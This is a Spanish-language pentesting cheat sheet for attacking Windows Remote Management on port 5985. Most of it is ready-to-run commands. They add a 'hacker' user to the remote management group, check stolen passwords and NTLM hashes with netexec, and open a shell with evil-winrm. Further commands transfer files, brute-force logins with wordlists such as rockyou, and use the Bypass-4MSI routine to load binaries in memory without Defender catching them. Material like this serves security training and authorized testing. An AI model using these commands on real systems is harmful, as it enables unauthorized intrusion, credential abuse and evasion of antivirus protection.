⚪ 5985 - WINRM (TCP)
Información Básica
WinRM (Windows Remote Management) es la implementación de Microsoft de WS-Management en Windows, que permite que los sistemas accedan o intercambien información de administración a través de una red común.
El usuario tiene que formar parte del grupo Remote Management Users/Usuarios de administración remota para tras autenticarse, disponer de capacidad para obtener una consola interactiva con PowerShell.
net localgroup "Remote Management Users" hacker /add
net localgroup "Usuarios de administración remota" hacker /add
Puerto Estándar: 5985
PORT STATE SERVICE
5985/tcp open wsman
PORT STATE SERVICE
5985/tcp open Microsoft HTTPAPI httpd 2.0
Si Nmap no obtiene el encabezado del servicio, consultará la DB IANA para determinar el servicio asociado al puerto.
Validar Credenciales
# password
netexec winrm 192.168.1.2 -u 'svc-alfresco' -p 's3rvice'
# hash
netexec winrm 192.168.1.2 -u 'administrator' -H 32693b11e6aa90eb43d32c72a07ceea6
Conectar
# apt install -y evil-winrm
# gem install evil-winrm
evil-winrm -i 192.168.1.2 -u 'svc-alfresco' -p 's3rvice' # password
evil-winrm -i 192.168.1.2 -u administrator -H 32693b11e6aa90eb43d32c72a07ceea6 # hash
File Transfer
Evil-WinRM PS C:\Windows\Temp> upload file
Evil-WinRM PS C:\Windows\Temp> download file
Brute Force
# user
netexec winrm 192.168.1.2 -u usernames.dic -p 'Password1'
# password
netexec winrm 192.168.1.2 -u administrador -p rockyou.txt
# hash
netexec winrm 192.168.1.2 -u administrador -H hashes.dic
AMSI (Bypass)
Al intentar subir un archivo o un binario es posible que el Defender lo bloquee y elimine por considerarlo malicioso, esto ocurre porque lo escribe directamente en disco siendo fácilmente detectable.
Podemos cargar el binario directamente en memoria con Evil-WinRM sin escribir en disco.
Evil-WinRM PS C:\Windows\Temp> menu
Evil-WinRM PS C:\Windows\Temp> Bypass-4MSI
Evil-WinRM PS C:\Windows\Temp> Invoke-Binary /home/kali/binary.exe
© d4t4s3c 2023-2025